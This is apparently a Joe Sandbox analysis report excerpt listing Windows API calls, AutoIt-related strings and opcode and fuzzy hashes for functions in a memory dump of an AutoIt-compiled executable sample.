• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
• Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
• Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
• Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetWindowRect.USER32(?,?), ref: 004701EA
• GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 867697134-248962490
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
• ReleaseDC.USER32(?,00000000), ref: 0044A1D6
• GetSysColor.USER32(0000000F), ref: 0044A1EC
• GetWindowLongW.USER32(?,000000F0), ref: 0044A207
• GetSysColor.USER32(0000000F), ref: 0044A216
• GetSysColor.USER32(00000005), ref: 0044A21E
• GetWindowDC.USER32 ref: 0044A277
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
• GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
• ReleaseDC.USER32(?,00000000), ref: 0044A2D8
• SetTextColor.GDI32(00000000,?), ref: 0044A2F6
• SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
• GetStockObject.GDI32(00000005), ref: 0044A312
• SetBkColor.GDI32(00000000,00000000), ref: 0044A328
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
• Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
• Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 790654849-1810252412
• Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
• Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
• Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• GetForegroundWindow.USER32(?,?), ref: 0046D7C1
• GetForegroundWindow.USER32 ref: 0046DBA4
• IsWindow.USER32(?), ref: 0046DBDE
• GetDesktopWindow.USER32 ref: 0046DCB5
• EnumChildWindows.USER32(00000000), ref: 0046DCBC
• EnumWindows.USER32(00460772,?), ref: 0046DCC4
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
Strings
Similarity
• API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 1322021666-1919597938
• Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
• Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
• Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
• Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
APIs
Strings
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
• Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
APIs
• CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
• GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
• strncnt.LIBCMT ref: 00428646
• strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1776594460-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
APIs
• LoadIconW.USER32(?,00000063), ref: 004545DA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
• SetWindowTextW.USER32(?,?), ref: 00454606
• GetDlgItem.USER32(?,000003EA), ref: 0045461F
• SetWindowTextW.USER32(00000000,?), ref: 00454626
• GetDlgItem.USER32(?,000003E9), ref: 00454637
• SetWindowTextW.USER32(00000000,?), ref: 0045463E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
• GetWindowRect.USER32(?,?), ref: 00454688
• SetWindowTextW.USER32(?,?), ref: 004546FD
• GetDesktopWindow.USER32 ref: 00454708
• GetWindowRect.USER32(00000000), ref: 0045470F
• MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
• GetClientRect.USER32(?,?), ref: 0045476F
• PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
• SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
• Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
• LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
• LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
• LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
• LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
• LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
• LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
• LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
• LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
• LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
• LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
• LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
• LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
• LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
• LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
• LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
• GetCursorInfo.USER32 ref: 00458E03
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2577412497-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 004696E0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00468107
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3993528054-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
